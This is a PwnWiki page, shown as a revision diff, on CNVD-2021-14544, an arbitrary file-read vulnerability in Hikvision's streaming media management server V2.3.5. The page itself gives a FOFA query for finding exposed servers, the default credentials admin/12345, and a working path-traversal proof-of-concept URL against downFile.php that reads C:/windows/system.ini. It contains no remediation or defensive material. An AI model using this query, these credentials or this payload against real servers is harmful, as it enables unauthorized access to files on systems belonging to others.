Difference between revisions of "CNVD-2021-14544 HIKVISION 流媒體管理服務器 後台任意文件讀取漏洞"

From PwnWiki
(Created page with "<languages /> <translate> ==漏洞影響== </translate> <pre> 杭州海康威视数字技术股份有限公司 流媒体管理服务器 V2.3.5 </pre> ==FOFA== <pre> FOFA:...")
 
(Marked this version for translation)
 
Line 2: Line 2:
  
 
<translate>
 
<translate>
==漏洞影響==
+
==漏洞影響== <!--T:1-->
 
</translate>
 
</translate>
 
<pre>
 
<pre>
Line 15: Line 15:
  
 
<translate>
 
<translate>
==默認登錄信息==
+
==默認登錄信息== <!--T:2-->
 
</translate>
 
</translate>
 
<pre>
 
<pre>
Line 27: Line 27:
  
 
<translate>
 
<translate>
 +
<!--T:3-->
 
成功讀取 C:/windows/system.ini
 
成功讀取 C:/windows/system.ini
 
</translate>
 
</translate>
  
 
<translate>
 
<translate>
==參考==
+
==參考== <!--T:4-->
 
</translate>
 
</translate>
 
https://mp.weixin.qq.com/s/bnXxGWs0ft0G6Qcdlf9BDw
 
https://mp.weixin.qq.com/s/bnXxGWs0ft0G6Qcdlf9BDw

Latest revision as of 11:44, 26 March 2021

Other languages:
Chinese • ‎中文(简体)‎ • ‎中文(繁體)‎

漏洞影響

杭州海康威视数字技术股份有限公司 流媒体管理服务器 V2.3.5

FOFA

FOFA:title="流媒体管理服务器"


默認登錄信息

admin/12345

POC

http://xxx.xxx.xxx.xxx/systemLog/downFile.php?fileName=../../../../../../../../../../../../../../../windows/system.ini

成功讀取 C:/windows/system.ini

參考

https://mp.weixin.qq.com/s/bnXxGWs0ft0G6Qcdlf9BDw

Retrieved from "https://pwnwiki.com/index.php?title=CNVD-2021-14544_HIKVISION_流媒體管理服務器_後台任意文件讀取漏洞&oldid=658"